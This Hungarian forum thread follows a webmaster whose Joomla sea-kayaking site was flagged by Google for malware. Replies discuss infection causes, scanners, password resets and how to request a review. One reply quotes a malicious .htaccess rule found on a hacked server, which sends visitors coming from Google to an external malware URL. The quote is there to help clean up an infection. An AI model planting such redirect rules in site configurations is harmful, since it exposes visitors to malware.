google-figyelmeztetés

Web, mail, IRC, IM, hálózatok

Sziasztok.

Egy érdekes levelet kaptam reggel a kávé mellé a google-tól.
Nem tudom mire vélni, mert a honlapom megy, a keresők behozzák. Ez valami olyan direkt marketing, mellyel véletlenszerűen bombázzák a plebset, hogy vegyen biztonsági szoftvert?

Íme a levél:

Dear site owner or webmaster of tengerikajak.info,

We recently discovered that some of your pages can cause users to be infected with
malicious software. We have begun showing a warning page to users who visit these pages
by clicking a search result on Google.com.

Below are some example URLs on your site which can cause users to be infected (space
inserted to prevent accidental clicking in case your mail client auto-links URLs):

http://tengerikajak.info/
http://www.tengerikajak.info/
http://tengerikajak.info/index.php/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//valamim.info/

We strongly encourage you to investigate this immediately to protect your visitors.
Although some sites intentionally distribute malicious software, in many cases the
webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser

If your site was compromised, it's important to not only remove the malicious (and
usually hidden) content from your pages, but to also identify and fix the vulnerability.
We suggest contacting your hosting provider if you are unsure of how to proceed.
StopBadware also has a resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you've secured your site, you can request that the warning be removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users, we will remove the
warning.

Sincerely,
Google Search Quality Team

Note: if you have an account in Google's Webmaster Tools, you can verify the authenticity
of this message by logging into https://www.google.com/webmasters/tools/siteoverview and
going to the Message Center, where a warning will appear shortly.

(a weblapom címét eredetileg nem írtam kia fenti levélben, különben a google az .info előtt space-t rakott a levélben...)

Szóval kapott már ilyet közületek valaki? Ha igen, mit tettetek vele?

  • 7531 megtekintés

( kiuka | 2012. 12. 14., p – 14:01 )

használj olyan böngészőt ami normális / ne cacheből töltögesd az oldalad, és akkor már kevésbé fog bejönni.

( les10 v | 2012. 12. 14., p – 15:00 )

Szuper, hogy átírtad a weblapod címét egy fiktív címre, így viszont törött linkeket helyeztél el a bejegyzésedben, amely nem túl hasznos a HUP-nak...

( 1mpulsive | 2012. 12. 14., p – 16:12 )

"Dear site owner or webmaster of tengerikajak.info"
"a weblapom címét szándékosan átírtam a fenti levélben, nehogy holmi SEOzónak nézzetek."

OK.
-----
richard

http://www.stopbadware.org/common-hacks

Legjobb megoldás az, ha valaki oly módon takarít, hogy azt a néhány száz írást darabonként átrakja egy másik tárhelyre, majd beállítja a template-et, telepíti a modulokat és kész? Márciusban csináltam egy ilyet, 2 hetem ráment és megőrültem tőle, azóta rezeg a feje, szerintem monitoron keresztül érzitek is...

---
--- A gond akkor van, ha látszólag minden működik. ---
---

( Chas | 2012. 12. 14., p – 16:37 )

Szia!
Megnéztem a tengerikajakot, én nem látok rajta semmit... Ellenben szinte biztos, hogy a háttérben van valami más weblap, és e-mail bombából oda vezet a link-. Kintről nem látszik, csak a mailből.

Egyébként nem is ezzel van a gond, mert a keresőjében azt büntet amit akar, de hogy a FF/stopbadware is sír a támadó weboldal miatt, nekem már kicsit sok (pl. vicces volt, mikor az egész extra.hu/themes tartományt tiltotta (minden aldomainen), pár fertőzött oldal miatt).
--
Direp

Nos, nem egészen, mert figyelembe véve a google elterjedtségét egy hibás riasztás, jelentés komoly presztízsveszteséget jelenthet egy cég életében. Esetleg csak azért, mert szerintük csak /24 alapján lehet szűrni a netet, és egy cím miatt tiltanak egy egész tartományt. Némiképp más kérdés az egy címen hostolt több(száz) oldalból egy miatt a többi is szív esete, de azért az is kellemetlen lehet.

Site is listed as suspicious - visiting this web site may harm your computer.
Google has not visited...
...did not appear...
...has not hosted...

Viszont: third parties can add malicious code to legitimate site

Nekem ebből nem az jön le, hogy minden fasza, más volt a hibás, hanem hogy valaki gonosz dolgot helyezett el az oldalalom. In some cases. Szóval ahogy én értelmezem, valami bajunk van veled, de nem mondjuk meg hogy mi, de lehet hogy ez. De nem biztos. Tisztára mint a jahú ("We cannot provide you with specific information other than to encourage you to evaluate your mailing policies and practices to see how you may be able to improve your sending reputation.")

"Of the 7 pages we tested on the site over the past 90 days, 7 page(s) resulted in malicious software being downloaded and installed without user consent."

Ennek nekifuthatnal megegyszer...

----------------------
"ONE OF THESE DAYS I'M GOING TO CUT YOU INTO LITTLE PIECES!!!$E$%#$#%^*^"
--> YouTube csatornám

( bzs v | 2012. 12. 14., p – 20:58 )

Nézzük csak mi van, hátha megy ez ösztönösen is.
Google azt mondja, tegyek valami tt file-t a gyökérbe.
Letöltöm, majd a további utasításra odaklikkelek a verify-ra.
Továbblép, de gratulál is:

Webmaster Tools

Congratulations, you have successfully verified your ownership of http://tengerikajak.info/.
Continue

Aztán bejön a Webmaster tools.

Ma már fáradt vagyok a továbbiakhoz, elolvasom, miket írtatok odafenn még egyszer.

Van szerintetek a BME-n olyan könyv, ami hasznos lehet most?
(alapból vagyok könyvpárti..)

---
--- A gond akkor van, ha látszólag minden működik. ---
---

( Stageline | 2012. 12. 15., szo – 11:04 )

Mi is most tapasztaltunk hasonlót, a .htaccess file-ba írkál bele valami.. ami rewrite-vel vírusos oldalra irányít, de csak akkor ha a referer a google kereső. Normálisan beállított szerveren ilyen nem fordul elő. Sajnos a php alapban gyakorlatilag mindent megenged.


RewriteCond %{HTTP_REFERER} ^.*(google)\.(.*)
RewriteRule ^(.*)$ http://izzqlk.qhigh.com/tranmlikegaozo1931.cgi?3 [R=301,L]

Anno volt hasonló kínom, mint a topik nyitójának. Hiába kerestük a bűnös php-t, elég sok fájl volt a htdocs-ban, nem találtuk. Ekkor bukkantam rá erre a keresőre, kipróbáltuk, s megtalálta, kiirtotta. Azóta minden nap frissül cronból a db-je, lefut naponta többször is. Az első futás hosszú, mert indexet csinál, a többinél már csak azokra fut rá, ami megváltozott. Értelem szerűen nem csodaszer, de a szokásos fertőzéseket, mint pl a JS-be beköltözés, vagy az index.html végére beágyazás, megtalálja. Lekopogom, már jó ideje nem volt dolga a kicsikének. :)

A általam ajánlottat a szerverre kell telepíteni, tehát nem árt hozzá root jog. Az általad talált annyit tud keresni, ami kifelé látszik. Egy Joomla esetén van olyan fájl, ami kifelé nem látszik, de szervesen részt vesz a tartalom kigenerálásában, ebből egy ilyen webes cucc nem tudja megmondani, hol a hiba, max annyit, hogy van valami az oldalon.

Nem az a gond, hogy kérdezel, vagy hogy csinálod, hanem hogy egy olyan szintű problémába ütköztél, amit láthatóan zsigerből nem tudsz már megoldani. Ezzel sincs gond, nem érthet mindenki mindenhez. Az oldaladat tiltólistára tették, s ez hosszú távon az oldaladnak nagyon nem tesz jót. Ahhoz, hogy megtaláld a hiba helyét, hozzáférés kell a szerverhez, s telepítéshez/módosításhoz jogosultság. Mindenképpen ajánlott lesz FTP és egyéb belépési jelszavak cseréjére, de előtte a fertőzést meg kell szüntetni. S még ez sem garantálja, hogy nincs további hátsó ajtó a rendszerben. A fertőzés megszüntetése után még mindig tiltólistán leszel. A Google webmester eszközökben tudod majd kérni a feloldást rá.
Akkor kezdjük elölről, hogy tiszta legyen a kép, s hogy segíteni tudjunk:
- ez egy tárhely?
- ez egy VPS/vas?
- milyen adminisztrációs lehetőségeid vannak?
- van-e dedikált rendszergazda, akit értesíteni tudsz?

Ez utóbbi nem volna hátrányos, mivel jellemzően Joomla és WP oldalaknál használatos harmadik féltől származó modulokon keresztül csontig szoktak törni szervereket, tehát simán elképzelhető, hogy rajtad keresztül mások is kaptak belőle (vagy másokon keresztül kaptál Te). Többek közt ezért sem elhanyagolható ilyenkor a gyors és szakszerű beavatkozás.

Amit tudok még ajánlani, ha nincs leheetőséged alkalmazást telepíteni:
mentsd le az oldalt db-vel együtt, s tegyél ki egy sima html-t "karbantartás alatt" felirattal. Ez után változtass FTP jelszót, s mindent, ami adminolásra alkalmas. Ezután a webmaster tools-ban tudod kérni a felülvizsgálatot, le fogják venni a tiltást. Ha ez megvan, akkor nulláról újraépíted az oldalt (figyelve arra, hogy olyan fájlt ne tölts vissza régiből, ami feltételezhetően fertőzött lehet).

szerk.: ha már lementetted, tegyél fel egy virtualbox-ba egy linuxot, helyezd egy a weblap fájljait egy mappában, telepítsd fel a virtuális gépre a maldet-et, s futtasd le a mappára. Így lesz némi lehetőséged arra, hogy kiszűrd a problémás állományt.

Még egy dolog: nem ártana a saját gépedet is megkergetni valami vírus/kémprogram keresővel (láthatóan csak ftp/http/https/nagios van nyitva a domain-edre), TC és hasonló FTP kliensekből simán lopnak jelszót, tehát simán lehet, hogy nem a Joomla-n keresztül másztak be, hanem egyszerűen valid jelszóval FTP-n.

( EdgarPE | 2012. 12. 15., szo – 21:59 )

Lehetne kamu email is, de úgy tűnik az elérhető infókból, hogy nem kamu.

Javaslom lépj be a Google Webmaster Tools-ba, ott kapsz közvetlen infót, hogy hol és mit találtak malware-nek.

Ha nem nyilvánvaló hogy mi a hiba, akkor érdemes az adott url-t telejsen letiltani .htaccess-ből vagy valahogy máshogy. Ha meg tudod oldani, akkor 503-as kódot vagy 404-es kódot adj ki.

( bzs v | 2012. 12. 16., v – 15:56 )

Na majd ez itt:

http://forum.joomla.org/viewtopic.php?f=432&t=778693

Elhelyeztem egy php file-t a tárhely gyökerében, majd a honlapot a tk.info//jamss.php címmel böngészőbe írva elindítottam valami lavinát.
Kiíródnak a dolgok, jó sok anyag, az alexandriai könyvtár nudli ehhez képest, majd végez, végül alul közlés tárgyát képezi az üzenet: ajánlatos törölni ezt a log-ot.

Holnap megnézem, mi is volt ez.
Valami varázsló.

Ha megoldotta ez az összes hibát, rendben van. És ezúton szeretnék elnézést kérni mindenkitől, aki azon nézeten volt, hogy ne üssem bele az orrom olyanba, amihez nem értek. a jövőben is bele fogom ütni az orrom olyanba, amihez nem értek.
Példa: NEM értek a DNS működéséhez, mégis használom... Ki az, aki nem?

---
--- A gond akkor van, ha látszólag minden működik. ---
---

( bfoto | 2012. 12. 16., v – 16:33 )

Szerintem semmi baj nincs ezzel, amig sajat projektrol van szo. Nyilvan vallalod vele a kockazatot, hogy esetleg szakmai kompetencia hianya miatt elofordulhat latogatottsag-kieses es mas hasonlok, de ha meg ezzel egyutt is jobban jossz ki, mintha szakembernek kellene fizetni, akkor lehet ez akar jo dontes is.
--
Direp

---Te fizettél bármit is szakembernek, amikor hasonlókat kezdtél el csinálni? (kis közösségnek szóló hírportál üzemeltetése egyedül)
---Mit tartasz szakembernek, magadat meg mettől kezdted el annak tartani?
---Hogyan ismered fel manapság, mai fejjel a nem szakembereket?
---Milyen utakon találtál rá honlapjaid anomáliáinak megoldásaira?

---
--- A gond akkor van, ha látszólag minden működik. ---
---

Nem érzem úgy, hogy ha válaszolnék bármely kérdésedre, az előrébb vinné a probléma megoldását. Igazából fére is ment a poszt (telefonról írtam), arra akartam csupán reagálni, amit fentebb írtál, hogy milyen kockázatok várhatók akkor, ha olyan dologba üti valaki az orrát, amihez nem ért (velem is előfordul ilyen). Ha ez pl. neked nem jelent komoly problémát, akkor nincs min idegeskedni, fel lehet fogni az egészet érdekes fejleménynek, önképzésre lehetőséget adó különleges eseménynek is..
--
Direp

( sany | 2012. 12. 16., v – 17:22 )

ff 17.01 al próbáltam megnyitni
azt irja hogy
"bejelentett támadó weboldal"
valami négis csak lehet?

"Once you've secured your site, you can request that the warning be removed by visiting"
Sajnos a várakozás kevés lesz, neked kell kérned a felülvizsgálatot, amint a fertőzést megszüntetted.
Ez a cucc egyébként írt valamit arról, hogy talált és tisztított valamit?

Igen, de nem hét helyen talált dolgot, hanem 682 helyen.
Igen, volt valahol egy szöveg valóban, hogy nekem kell felülvizsgálatot kérnem, mint valami rendelőben. S n azt fogom tenni, amit googlenagytestvér mond.

---
--- A gond akkor van, ha látszólag minden működik. ---
---

Igen, csak log volt. 93 a fertőzött.
Jeleztem a dolgot a goglénak, hogy remélem, sikerült orvosolnom a dolgokat. Válasz nem jött, de leszedték a tiltást:

tengerikajak.info --- minden, ami tengeri kajakozás
tengerikajak.info/ - Cached - Translate this page
www.tengerikajak.info --- tengeri kajak túrák, köteles kanyontúrák szervezése, tengeri kajak lapát készítése, tengeri kajak lapát javítása, tengeri kajak uszodai ...
You've visited this page many times. Last visit: 12/13/12

Eddig ott volt egy sor, amey tartalmazta, hogy közveszélyes a honlap. Már nincs ott.

Gőzöm sincs mi történt és hogy mit tettem, arról végképp nincs, mitől javítottam meg.

Mindenesetre elgondolkodom, megnézem az a php-kódot, amit az a fenti horvát arc épített fel. Szóval valahol elkezdek majd PHP-zni, mert kell, nem úszom meg.

---
--- A gond akkor van, ha látszólag minden működik. ---
---